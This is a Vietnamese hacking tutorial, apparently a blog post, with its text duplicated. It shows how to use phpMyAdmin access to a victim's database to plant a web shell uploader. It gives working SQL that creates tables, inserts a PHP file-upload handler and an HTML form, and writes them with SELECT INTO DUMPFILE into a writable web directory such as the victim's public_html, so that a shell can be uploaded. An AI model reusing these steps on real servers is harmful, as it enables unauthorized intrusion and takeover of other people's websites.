Nguồn: Quỷ Lệ - CEH
Chào tất cả các bạn, tranh thủ thời gian ranh rỗi còn lại hôm nay mình sẽ hướng dẫn các bạn tạo form upload thông qua phpmyadmin.
Việc này rất hữu dụng khi local attack. Ta đã view được config tuy nhiên ko crack được pass hay không vô được admincp của victim, không cp shell qua được.... Vậy làm thế nào để up được shell lên đây
Trong bài này mình sẽ hướng dẫn các bạn giải quyết vấn đề đó
1. creat tables userform
2. creat tables user_upload
3. Chèn code vào tables
a. tables user_upload
Chú ý: E:/OpenServer/domains/vhb.shell/ là vị trí sẽ upload file lên khi ta upload bằng form, các bạn sửa cho đúng nhé. Ví dụ:
/home/user-victim/public_html
p/s: chọn chỗ nào có quyền ghi nhé
b. tables userform
4. Xuất ra thành file php
a. form.php
b. upload.php
chú ý: E:/OpenServer/domains/vhb.shell/form.php và E:/OpenServer/domains/vhb.shell/upload.php là vị trí ta muốn xuất file tới
Video: các bạn down video xem sẽ hiểu nhé:
Click Here
pass: vhb
* Link dự phòng
Click Here
Chào tất cả các bạn, tranh thủ thời gian ranh rỗi còn lại hôm nay mình sẽ hướng dẫn các bạn tạo form upload thông qua phpmyadmin.
Việc này rất hữu dụng khi local attack. Ta đã view được config tuy nhiên ko crack được pass hay không vô được admincp của victim, không cp shell qua được.... Vậy làm thế nào để up được shell lên đây
Trong bài này mình sẽ hướng dẫn các bạn giải quyết vấn đề đó
1. creat tables userform
Mã:
CREATE TABLE `tên-data-của-victim`.`userform` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;2. creat tables user_upload
Mã:
CREATE TABLE `tên-data-của-victim`.`user_upload` (
`track2` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;3. Chèn code vào tables
a. tables user_upload
Mã:
INSERT INTO user_upload
VALUES (
"<?php $uploaddir = 'E:/OpenServer/domains/vhb.shell/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if
(move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=#000></br></br><div
align=center><font size=5 color=#ff0000>Uploaded successfully !!</font></body>'; } else { print '<body
bgcolor=#000></br></br><div align=center><font size=5 color=#ff0000> Uploaded Failed !!</font></body>'; } ?> "
);Chú ý: E:/OpenServer/domains/vhb.shell/ là vị trí sẽ upload file lên khi ta upload bằng form, các bạn sửa cho đúng nhé. Ví dụ:
/home/user-victim/public_html
p/s: chọn chỗ nào có quyền ghi nhé
b. tables userform
Mã:
insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
>
<head>
VHB Group
</head>
<body bgcolor="#000000">
<div style=" color:#F00;text-align:center; margin-top:60px; font-size:25px;
">>> Upload !!! </div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action="upload.php" method="post">
<input name="userfile" type="file" />
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>');4. Xuất ra thành file php
a. form.php
Mã:
select * into dumpfile 'E:/OpenServer/domains/vhb.shell/form.php' from userformb. upload.php
Mã:
select * into dumpfile 'E:/OpenServer/domains/vhb.shell/upload.php' from user_uploadchú ý: E:/OpenServer/domains/vhb.shell/form.php và E:/OpenServer/domains/vhb.shell/upload.php là vị trí ta muốn xuất file tới
Video: các bạn down video xem sẽ hiểu nhé:
Click Here
pass: vhb
* Link dự phòng
Click Here
Đăng nhận xét